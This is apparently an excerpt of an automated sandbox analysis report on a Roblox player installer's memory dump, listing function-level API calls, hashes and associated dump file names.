                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: !$csm
                                                                                                                  • API String ID: 1170836740-2393827367
                                                                                                                  • Opcode ID: 4f05c36886ad279043ee318f09a60d415d685e3d709ae9510d59e1871af75603
                                                                                                                  • Instruction ID: ba8e1cadbb071115f9cb071678ee0bcd06e2a0442b234229f1d68d967d0c2797
                                                                                                                  • Opcode Fuzzy Hash: 4f05c36886ad279043ee318f09a60d415d685e3d709ae9510d59e1871af75603
                                                                                                                  • Instruction Fuzzy Hash: 5141B570A002099FCF10DF6AE888A9EBFE5EF55214F14C0A9E9545B355DB32E941CB91
                                                                                                                  Function 011043CE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5791E0C7,?,?,00000000,0112D7FB,000000FF,?,011043A1,00000002,?,01104375,010F466F), ref: 01104403
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01104415
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0112D7FB,000000FF,?,011043A1,00000002,?,01104375,010F466F), ref: 01104437
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: !$CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1298785431
                                                                                                                  • Opcode ID: cf68df7d65530426a0dfd7b8ab4ae0682002c79867ce73492cc497b8022f5985
                                                                                                                  • Instruction ID: 684fe968504221ea59f029bd5a8d57efea908b1f727dcdd324b5a6144e29b95d
                                                                                                                  • Opcode Fuzzy Hash: cf68df7d65530426a0dfd7b8ab4ae0682002c79867ce73492cc497b8022f5985
                                                                                                                  • Instruction Fuzzy Hash: 2601DB71E00629EFDB198F54DC05FAE7BB8FB04B51F004629F921E26D4DBB49900CB50
                                                                                                                  Function 011039C5 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 306COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 0-1801386649
                                                                                                                  • Opcode ID: f4a4214ace11eae541d1ce3465b4f0faff54a6ee3bbf770b4a6aada947e2773e
                                                                                                                  • Instruction ID: 652f12ab3a7386212e28874d2bdffc11321335d6eb52bccfbfb36d65cd92f445
                                                                                                                  • Opcode Fuzzy Hash: f4a4214ace11eae541d1ce3465b4f0faff54a6ee3bbf770b4a6aada947e2773e
                                                                                                                  • Instruction Fuzzy Hash: 0DA13472E202158FEF2FEF6CD4886ACBBB1BF15318F15402AD524AB2D1D7B19880CB51